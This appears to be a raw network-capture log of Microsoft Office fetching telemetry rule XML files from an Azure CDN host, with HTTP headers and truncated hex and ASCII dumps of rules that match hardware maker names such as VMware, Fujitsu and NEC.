                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                                            x-ms-request-id: 417b6c53-401e-0029-0d91-3f9b43000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175943Z-174f7845968kvnqxhC1EWRmf3g0000000t0000000000qbme
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:43 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            56192.168.2.44993313.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:43 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:43 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                            x-ms-request-id: 6ab56c84-d01e-008e-48c7-43387a000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175943Z-174f7845968frfdmhC1EWRxxbw00000016bg000000008zk6
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:43 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            57192.168.2.44993413.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:43 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:43 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:43 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                            x-ms-request-id: de914170-201e-0000-68ad-45a537000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175943Z-174f7845968swgbqhC1EWRmnb400000016fg000000006u56
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_MISS
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:43 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            58192.168.2.44993513.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:43 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:44 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 464
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                            x-ms-request-id: e1f54f45-601e-0097-18a1-42f33a000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175944Z-174f7845968ljs8phC1EWRe6en000000164g00000000b972
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:44 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            59192.168.2.44993713.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:44 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:44 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                            x-ms-request-id: ef6c78e4-401e-0067-2ec7-4309c2000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175944Z-174f78459684bddphC1EWRbht400000015xg00000000t3zs
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:44 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            60192.168.2.44994613.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:45 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:45 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                                            x-ms-request-id: 264c510b-001e-000b-0eb2-4215a7000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175945Z-174f7845968cpnpfhC1EWR3afc00000015t000000000ub9b
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:45 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            61192.168.2.44994513.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:45 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:45 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                                            x-ms-request-id: e044a7be-f01e-003c-0c76-438cf0000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175945Z-174f7845968glpgnhC1EWR7uec00000016dg00000000ey0c
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:46 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            62192.168.2.44994713.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:45 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:46 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                                            x-ms-request-id: 3f7caad5-701e-006f-6962-43afc4000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175946Z-174f784596886s2bhC1EWR743w000000167000000000svpw
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:46 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            63192.168.2.44995113.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:46 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:46 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                                            x-ms-request-id: 5181e575-b01e-001e-206f-430214000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175946Z-174f7845968jrjrxhC1EWRmmrs00000016b000000000mzsz
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:46 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            64192.168.2.44995813.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:46 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:47 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 428
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
